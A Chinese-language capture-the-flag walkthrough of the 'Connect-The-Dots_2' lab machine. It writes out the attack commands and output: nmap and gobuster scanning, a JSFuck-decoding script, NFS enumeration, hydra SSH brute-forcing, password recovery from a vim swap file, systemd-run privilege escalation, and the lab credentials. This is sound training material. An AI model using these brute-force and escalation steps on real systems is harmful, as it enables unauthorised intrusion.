Connect-The-Dots_2

Connect-The-Dots_2

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.148

    arp-scan -l
    

    在这里插入图片描述

  • 端口扫描

    nmap -A -p- -sV 192.168.80.148开放端口
    21/tcp    open  ftp      vsftpd 2.0.8 or later
    80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
    111/tcp   open  rpcbind  2-4 (RPC #100000)
    2049/tcp  open  nfs      3-4 (RPC #100003)
    7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
    33741/tcp open  nlockmgr 1-4 (RPC #100021)
    39565/tcp open  mountd   1-3 (RPC #100005)
    56517/tcp open  mountd   1-3 (RPC #100005)
    58767/tcp open  mountd   1-3 (RPC #100005)
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    Happy Birthday brother!You know how our family have named us, right? Them naming me M and you N. Well, our names are entirely the same except the initials. Life is too short to save names in your memory when you're old, so why not! But do you know who did that? Our mother who was fond of the James Bond movies. She named me after her as M. Perhaps, she thinks that the director of the movie was too lazy to think of one. I mean, who cares, right? Haha, I know you don't like me neither my pesky jokes. But I love you brother. So, don't visit this website until I am done. You'll find nothing but backups, lol.Btw, I know you love challenges so I have something in store for you as well.翻译
    生日快乐,兄弟!你知道我们家是怎么给我们取名的吧?他们叫我M,叫你n。嗯,我们的名字除了首字母外完全一样。生命太短暂了,当你老了的时候,为什么不把名字保存在你的记忆里呢?但你知道是谁干的吗?我们的母亲非常喜欢詹姆斯·邦德的电影。她以她的名字给我取名叫m。也许,她认为电影的导演太懒了,想不出一个名字。我是说,谁在乎呢?哈哈,我知道你不喜欢我,也不喜欢我那些讨厌的笑话。但是我爱你,兄弟。所以,在我完成之前不要访问这个网站。除了备份你什么都找不到,哈哈。顺便说一句,我知道你喜欢挑战,所以我也为你准备了一些东西。
    

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50路径
    /images               (Status: 301) [Size: 317] [--> http://192.168.80.148/images/]
    /manual               (Status: 301) [Size: 317] [--> http://192.168.80.148/manual/]
    /javascript           (Status: 301) [Size: 321] [--> http://192.168.80.148/javascript/]
    /backups              (Status: 200) [Size: 6301]
    /mysite               (Status: 301) [Size: 317] [--> http://192.168.80.148/mysite/]
    

    在这里插入图片描述

  • 访问/backups,就一个3s视频

    在这里插入图片描述

  • 访问/mysite,发现bootstrap.min.cs文件存在加密的东西

    在这里插入图片描述

  • 使用脚本将文件的字符串搞下来

    #coding=utf-8
    import requests
    import rereq = requests.get("http://192.168.80.148/mysite/bootstrap.min.cs").text
    data = re.findall('\s=\s\"(.*?)\"',req)print("".join(data))
    
  • 进行JSfuck解码

    http://www.liminba.com/tool/jsfuckdecode/alert("You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19")TryToGuessThisNorris@2k19可能是密码
    

    在这里插入图片描述

三、NFS渗透

  • 因为开放了2049端口,获取 nfs 服务器的目录列列表

    showmount -e 192.168.80.148得到用户名 morris
    

    在这里插入图片描述

  • 尝试挂载共享目录,没成功

    mount -t nfs 192.168.80.148:/home/morris dots
    

    在这里插入图片描述

四、爆破SSH

  • 得到一个用户名为morris,根据主页的提示,应该还一个用户名norris,尝试ssh爆破

    用户名:
    morris
    norris
    Morris
    Norris密码:
    TryToGuessThisNorris@2k19hydra -L /tmp/user -p TryToGuessThisNorris@2k19 192.168.80.148 ssh -s 7822 -vV
    

    在这里插入图片描述

  • 登录ssh

    ssh norris@192.168.80.148 -p 7822
    

    在这里插入图片描述

    在这里插入图片描述

五、二次信息收集

  • 登录ftp下载文件

    ftp 192.168.80.148
    

    在这里插入图片描述

  • 查看图片信息,发现摩斯密码

    exiftool game.jpg.bak.... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
    

    在这里插入图片描述

  • 解码

    HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.诺里斯,你已经走了这么远了。远离天堂,现在想看看地狱吗?哈哈,你肯定想我了,是吗?哦,该死的,我的电池快没电了,我找不到充电器这么快,在系统自动关闭之前在这里留下一个提示。我将地下城的入口保存在一个公开访问的“秘密文件”中。
    

    在这里插入图片描述

  • 寻找morris密码,在/var/www/html目录下发现一个secretfile 文件

    I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.我看你是来要密码的。神圣的魔草!电池快没电了!!以下提及供参考。
    

    在这里插入图片描述

  • 查看所有文件,发现.secretfile.swp文件,swp 是编辑器突然断电或者 ctrl+z 产生的文件

    在这里插入图片描述

  • 将文件下载下来,发现密码blehguessme090

    在这里插入图片描述

  • 登录ssh

    morris:blehguessme090ssh morris@192.168.80.148 -p 7822
    

    在这里插入图片描述

六、权限提升

  • systemd-run提权

    systemd-run -t /bin/bash输入TryToGuessThisNorris@2k19
    

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/206999.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vxe编辑保存表格

业务需求: 1、需要点击编辑时,全部表格显示编辑框,点击保存,全部保存。 2、因为位置问题,产品经理把24小时分成了两行,开发就得分两个表格。列标题是写死的,文字偏移也是写死的,其他…

Raspberry Pi 5 新一代单板计算机:树莓派5代 (介绍、入门、解疑)

树莓派5代正式发布后,硬件和性能的全面升级让众多开发者们都想入手感受一波,外观上Raspberry Pi 5 与前代产品非常相似,不过,在保留信用卡大小的整体尺寸的同时,也更新了一些设计元素,以适应新芯片组的功能…

跨境电商客服系统:提升客户满意度与优化电商体验的关键

随着全球电子商务的快速发展,跨境电商已经成为新的商业发展趋势。在这个高度竞争的市场环境中,优质的客户服务成为区分优秀与平庸的关键因素。一个高效的跨境电商客服系统不仅可以提高客户满意度,还能帮助企业优化电商体验,进而提…

Stable Diffusion XL网络结构-超详细原创

强烈推荐先看本人的这篇 Stable Diffusion1.5网络结构-超详细原创-CSDN博客 1 Unet 1.1 详细整体结构 1.2 缩小版整体结构 以生成图像1024x1024为例,与SD1.5的3个CrossAttnDownBlock2D和CrossAttnUpBlock2D相比,SDXL只有2个,但SDXL的Cros…

如何做好性能压测?压测环境设计和搭建的7个步骤你知道吗?

简介:一般来说,保证执行性能压测的环境和生产环境高度一致是执行一次有效性能压测的首要原则。有时候,即便是压测环境和生产环境有很细微的差别,都有可能导致整个压测活动评测出来的结果不准确。 1. 性能环境要考虑的要素 1.1 系…

超级有效的12个远程团队管理技巧

​​​​​ 标题前言 随着远程办公的兴起,虚拟管理团队已成为新常态。尽管混合和远程工作正在成为新常态,但管理远程团队也面临着一系列挑战。本文我们将为您提供 12个技巧,帮助您成功管理远程团队并改善协作。此外,我们将讨论定…

Autocad2020切换经典界面

Autocad2020切换经典界面 1.更改1.1设置另存为 1.更改 1.1设置另存为

Android进阶知识:ANR的定位与解决

1、前言 ANR对于Android开发者来说一定不会陌生,从刚开始学习Android时的一不注意就ANR,到后来知道主线程不能进行耗时操作注意到这点后,程序出现ANR的情况就大大减少了,甚至于消失了。那么真的是只要在主线程做耗时操作就会产生…

10年开发工程师总结,8大主流程序员兼职平台,月入30k不是梦!

今年互联网行业陆续裁员减薪,许多人怨声载道的同时也开始另谋出路。而对于程序员更是应该提早做好准备,活跃在兼职接单的最前沿。 我们程序员是一门技术工种,与互联网其他行业相比薪水会相对高一点,不过钱也不是那么好赚的&#…

引爆关注,聚焦上海新闻媒体邀请

传媒如春雨,润物细无声,大家好,我是51媒体网胡老师。 上海拥有众多的新闻媒体机构,包括报纸、电视、广播和网络媒体等。这些媒体在报道国内外新闻、传播信息等方面发挥着重要作用。 其中,上海电视台是上海最大的电视…

猫不长肉怎么办?增肥效果好、让猫咪迅速圆润起来的猫罐头分享!

秋冬来临,北方的猫咪有暖气还好过一些,南方的猫咪只能依靠自己的抵抗力来过冬。如果不囤点脂肪,怕冷的小猫咪要怎么过冬啊?有些猫咪无论怎么吃也吃不胖,真的让铲屎官很烦恼。想起我新手养猫的那段日子为了给我家猫咪增…

数字化转型:传统门店突破困境,实现可持续发展的必由之路

自2023年疫情管控基本解除以来,人民群众体验线下消费的意愿充分释放,夜经济、文娱文旅消费、暑期经济等线下消费场景持续走热。据统计,今年1-7月份,我国实体店零售额同比增长4.2%。虽然实体经济出现了消费复苏,发展向好…